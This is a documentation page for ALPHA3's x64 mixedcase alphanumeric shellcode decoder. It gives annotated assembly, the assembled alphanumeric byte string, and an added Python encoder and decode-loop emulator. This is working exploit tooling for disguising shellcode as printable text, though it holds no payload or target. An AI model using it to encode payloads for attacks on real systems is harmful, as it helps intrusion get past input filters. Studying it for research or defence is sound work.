Hacking/Shellcode/Alphanumeric/ALPHA3/x64/ASCII/Mixedcase/Decoder
From Skypher
This page is part of the documentation for ALPHA3, an alphanumeric shellcode encoder by SkyLined.
CODE
Below is the assembler source for the ALPHA3 mixedcase ASCII alphanumeric code decoder for x64. It assumes that RCX points to its base address.
BITS 64
mult_code equ 0x33333333
mult_dword equ 0x05050503
mult_byte equ 0x33
mult_value equ mult_dword * mult_byte ; 0505,0503 * 33 = FFFF,FF99 (low 32 bits)
start:
PUSH RCX ; [ESP0] = start
PUSH mult_dword^mult_code ; [ESP1] = mult_dword^mult_code
PUSH RSP ; [ESP2] = address of [ESP1]
POP RCX ; RCX = address of [ESP1]
XOR [RCX], ESI ; [ESP1] = mult_dword^mult_code^ESI
XOR ESI, [RCX] ; ESI = mult_dword^mult_code
POP RAX ; Clear stack
PUSH mult_code ; [ESP1] = mult_code
XOR [RCX], ESI ; [ESP1] = mult_code^mult_dword^mult_code = mult_dword
IMUL ESI, [RCX], BYTE mult_byte ; ESI = [ESP1] * mult_byte = mult_value
POP RAX ; Clear stack
PUSH BYTE (esi_value & 0xFFFFFFFF) ^ mult_value ; [ESP1] = esi_value^mult_value (imm8, sign-extended)
PUSH RSI ; [ESP2] = mult_value
XOR [RCX], ESI ; [ESP1] = mult_value^esi_value^mult_value = esi_value
db 0x48, 0x63, 0x31 ; MOVSXD RSI, [RCX] ; RSI = esi_value (sign-extended to 64 bits)
POP RDX ; RDX = mult_value
POP RAX ; RAX = esi_value
POP RCX ; RCX = start
XOR [BYTE RCX+2*RSI + inc_marker - (esi_value*2)], DX ; RSI = esi_value, so this XORs the word at inc_marker with the low word of mult_value (see inc_marker below)
esi_value equ -0x10 ; -Something
decode_loop:
db 0x48 ; REX.W prefix for INC RSI
inc_marker:
dw 0xC6FF^(mult_value & 0xFFFF) ; the XOR above turns this into FF C6 = INC ESI, i.e. INC RSI with the REX.W prefix
IMUL EAX, [BYTE RCX + 2*RSI + jnz_marker + 1 - ((esi_value+1)*2)], BYTE 0x30 ; AL = first byte of the pair * 0x30 (low byte of the product)
XOR AL, [BYTE RCX + 2*RSI + jnz_marker + 2 - ((esi_value+1)*2)] ; AL ^= second byte of the pair
XOR [BYTE RCX + RSI + jnz_marker + 1 - (esi_value+1)], AL ; decoded byte overwrites the first byte of the pair; ZF set when it is zero
jnz_marker:
db 0x75 ; JNZ -0x12 (75 EE) back to decode_loop; the EE is produced by the first iteration of the loop
; (See http://skypher.com/wiki/index.php?title=IMUL_0x30_encoding)
; How the pair 4A 44 below decodes to EE:
; high nibble: A (low nibble of 4A) --IMUL 0x30--> E --XOR 4 (from 44)--> A --XOR 4 (from 4A)--> E
; low nibble: 4 (from 44) --XOR A (from 4A)--> E
db 0x4A ; high nibble of offset to decode_loop
db 0x44 ; low nibble of offset to decode_loop
Assembled, the code is 59 bytes and looks like this:
Qh0666TY1131Xh333311k13XjiV11Hc1XZYf1TqIHf9kDqW02DqX0D1HuJD
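The decode loop and the IMUL 0x30 pairing it undoes, modelled in Python as an added example (this is not ALPHA3 code and not part of the original page; function names such as decode_pair and run_decode_loop are my own). It goes beyond the single 4A 44 -> EE case above by checking that every byte value 0x00-0xFF has some mixedcase alphanumeric pair, and shows why the encoded stream must end in a decoded 0x00.

```python
import string

# Alphabet the mixedcase ASCII decoder can be fed: 0-9, A-Z, a-z (ints, ascending).
ALNUM = sorted(string.digits.encode() + string.ascii_letters.encode())

def decode_pair(hi: int, lo: int) -> int:
    """One iteration of decode_loop on the encoded pair (hi, lo)."""
    al = (hi * 0x30) & 0xFF  # IMUL EAX, [hi], BYTE 0x30: only the low byte reaches AL
    al ^= lo                 # XOR AL, [lo]
    return hi ^ al           # XOR [hi], AL: the decoded byte is written over hi

def encode_byte(target: int) -> tuple:
    """Find an alphanumeric (hi, lo) pair that decode_pair() turns into target.

    Rearranging decode_pair gives lo = target ^ hi ^ ((hi * 0x30) & 0xFF); try
    every alphanumeric hi and keep the first whose lo is alphanumeric as well.
    """
    for hi in ALNUM:
        lo = target ^ hi ^ ((hi * 0x30) & 0xFF)
        if lo in ALNUM:
            return hi, lo
    raise ValueError(f"no alphanumeric pair decodes to {target:#04x}")

def encode(payload: bytes) -> bytes:
    """Encode payload as alphanumeric pairs, followed by an encoded 0x00.

    The loop ends when a decoded byte is zero (JNZ falls through into the
    decoded code), so the payload itself must not contain 0x00.
    """
    if 0 in payload:
        raise ValueError("payload must not contain 0x00: it ends the decode loop")
    out = bytearray()
    for b in payload + b"\x00":
        out.extend(encode_byte(b))
    return bytes(out)

def run_decode_loop(blob: bytes) -> bytes:
    """Emulate decode_loop in place; blob[0] is the byte at jnz_marker+1.
    Iteration i reads the pair at 2*i, 2*i+1 and writes the decoded byte at i
    (the output never overtakes unread input); returns the bytes before the zero.
    """
    buf = bytearray(blob)
    i = 0
    while True:
        buf[i] = decode_pair(buf[2 * i], buf[2 * i + 1])
        if buf[i] == 0:
            return bytes(buf[:i])
        i += 1
```

Feeding run_decode_loop the page's "JD" pair followed by an encoded payload yields 0xEE (the JNZ displacement) and then the payload bytes, exactly as the real loop lays them out behind the JNZ.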
See also
- x64 printable opcodes - A list of all available opcodes for alphanumeric code on x64.
- IMUL 0x30 encoding - A description of the technique used to encode/decode the data.
SkyLined would like to thank the following people:
- rix for the phrack article on alphanumeric shellcode.
- obscou for the phrack article on unicode-proof shellcode.
- Costin Ionescu for the idea behind w32 SEH GetPC code.
- tms320/ph4nt0m Security Team for the article on using a different IMUL value in my alphanumeric decoders.
- jamikazu for his VML fill method BoF exploit that points the SEH to the heap to bypass Software DEP.
